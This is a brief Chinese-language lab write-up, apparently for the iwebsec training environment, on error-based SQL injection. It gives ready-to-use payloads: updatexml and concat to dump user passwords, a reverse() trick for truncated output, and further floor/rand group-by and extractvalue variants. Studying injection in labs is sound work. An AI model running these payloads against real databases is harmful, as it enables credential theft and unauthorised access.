一、解题过程
(一)直接上payload
?id=1^updatexml(1,concat(0x7e,(select group_concat(password) from iwebsec.users),0x7e),3)--+
说明:如果输出长度受限,需要用reverse反转再拼接
?id=1^updatexml(1,concat(0x7e,(select reverse(group_concat(password)) from iwebsec.users),0x7e),3)--+
二、后续分析
(一)报错注入探究
其他报错注入方式
1.rand和floor函数与group by的冲突
?id=-1 union select 1,count(*),3 from information_schema.tables group by concat(0x7e,database(),0x7e,floor(rand(0)*2))--+
2.extractvalue()函数
?id=-1^extractvalue(1,concat(0x7e,database(),0x7e))--+